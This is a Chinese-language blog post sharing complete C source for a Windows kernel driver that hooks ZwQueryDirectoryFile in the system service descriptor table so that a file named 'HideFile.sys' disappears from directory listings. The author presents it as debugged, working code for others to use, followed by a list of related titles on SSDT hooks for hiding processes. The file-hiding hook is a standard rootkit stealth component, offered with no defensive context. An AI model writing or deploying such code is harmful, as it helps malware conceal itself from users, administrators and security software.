hook ZwQueryDirectoryFile实现文件隐藏
来源:互联网 发布:阿里云php环境 编辑:程序博客网 时间:2024/04/29 21:06
学习了网上《编写驱动拦截NT的API实现隐藏文件目录》这篇文章 参考这篇文章的代码 自己试着写了下 现发出来我调试成功的代码 给需要的朋友们代码:#include "ntddk.h"typedef BOOLEAN BOOL;typedef unsigned long DWORD;typedef DWORD * PDWORD;typedef unsigned long ULONG;typedef unsigned short WORD;typedef unsigned char BYTE;// This is our unload function#pragma pack(1)typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase;} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;#pragma pack()__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;typedef struct _FILE_BOTH_DIR_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName[12]; WCHAR FileName[1];} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;// Our System Call TablePVOID* NewSystemCallTable;// Our Memory Descriptor ListPMDL pMyMDL;#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)#define HOOK(functionName, newPointer2Function, oldPointer2Function ) \ oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)#define UNHOOK(functionName, oldPointer2Function) \ InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function)NTSYSAPINTSTATUSNTAPI ZwQueryDirectoryFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileInformation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan );typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileInformation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan );ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile;NTSTATUS NewZwQueryDirectoryFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileInformation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan ){ NTSTATUS status; ULONG CR0VALUE; ANSI_STRING ansiFileName,ansiDirName,HideDirFile; UNICODE_STRING uniFileName; RtlInitAnsiString(&HideDirFile,"HideFile.sys"); DbgPrint("hide: NewZwQueryDirectoryFile called."); status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) ( FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); //这部分是隐藏文件的核心部分 if(NT_SUCCESS(status)&&FileInformationClass==FileBothDirectoryInformation) { PFILE_BOTH_DIR_INFORMATION pFileInfo; PFILE_BOTH_DIR_INFORMATION pLastFileInfo; BOOLEAN bLastOne; pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation; pLastFileInfo = NULL; do { bLastOne = !( pFileInfo->NextEntryOffset ); RtlInitUnicodeString(&uniFileName,pFileInfo->FileName); RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE); RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE); //DbgPrint("ansiFileName :%s\n",ansiFileName.Buffer); //DbgPrint("HideDirFile :%s\n",HideDirFile.Buffer); if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length) { if(bLastOne) { pLastFileInfo->NextEntryOffset = 0; break; } else //指针往后移动 { int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation; int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset; RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft ); continue; } } pLastFileInfo = pFileInfo; pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset); }while(!bLastOne); RtlFreeAnsiString(&ansiDirName); RtlFreeAnsiString(&ansiFileName); } return status;}NTSTATUS Hook( ){ pMyMDL = MmCreateMdl( NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices * 4 ); if( !pMyMDL ) return( STATUS_UNSUCCESSFUL ); MmBuildMdlForNonPagedPool( pMyMDL ); pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode ); if( !NewSystemCallTable ) return( STATUS_UNSUCCESSFUL ); // Add hooks here (remember to unhook if using DriverUnload) HOOK( ZwQueryDirectoryFile,NewZwQueryDirectoryFile ,OldZwQueryDirectoryFile); return( STATUS_SUCCESS );}NTSTATUS UnHook( ){ if( NewSystemCallTable ) { UNHOOK( ZwQueryDirectoryFile, OldZwQueryDirectoryFile ); MmUnmapLockedPages( NewSystemCallTable, pMyMDL ); IoFreeMdl( pMyMDL ); } return( STATUS_SUCCESS );}NTSTATUS OnUnload( IN PDRIVER_OBJECT DriverObject ){ NTSTATUS status; DbgPrint("OnUnload called\n"); status=UnHook(); return status;}NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath){ NTSTATUS status = STATUS_SUCCESS; DbgPrint("I loaded!"); // Initialize the pointer to the unload function theDriverObject->DriverUnload = OnUnload; // in the DriverObject //hook Hook(); return STATUS_SUCCESS;}
0 0
- hook ZwQueryDirectoryFile实现文件隐藏
- hook ZwQueryDirectoryFile实现文件隐藏
- hook ZwQueryDirectoryFile实现文件隐藏
- hook sys_getdents64隐藏文件
- HOOK 文件保护,隐藏 禁止访问
- Hook SHFileOperation实现文件监控
- SSDT HOOK实现文件保护
- 纯Delphi实现,Hook API实现进程隐藏代码!
- Linux内核通过inline hook实现隐藏进程
- 进程隐藏与进程保护(SSDT Hook 实现)
- 进程隐藏与进程保护(SSDT HOOK 实现)
- 进程隐藏与进程保护(SSDT Hook 实现)
- 进程隐藏与进程保护(SSDT Hook 实现)
- 简单HOOK SSDT实现文件防删除
- object hook实现禁止创建文件
- hook SDT隐藏进程
- 隐藏进程 hook ZwQuerySystemInformation
- hook zwQuerySysteminformation 隐藏进程
- Linux写Python脚本
- 算法笔记(X) 模拟与仿真
- PHP--面试题
- Linux的shell模拟实现
- 学习EventBus3的使用
- hook ZwQueryDirectoryFile实现文件隐藏
- 整合springboot-mybatis提供RESTful风格SaaS服务
- linux中定时备份数据库和定时删除(含压缩)
- ajax的四步骤
- 完美解决IE8不支持margin auto问题
- CSS 相对|绝对(relative/absolute)定位系列
- suse linux安装eclipse后无法启用,解决!
- MVC5 + EF6 完整入门教程三
- Jenkins进阶系列之——12详解Jenkins节点配置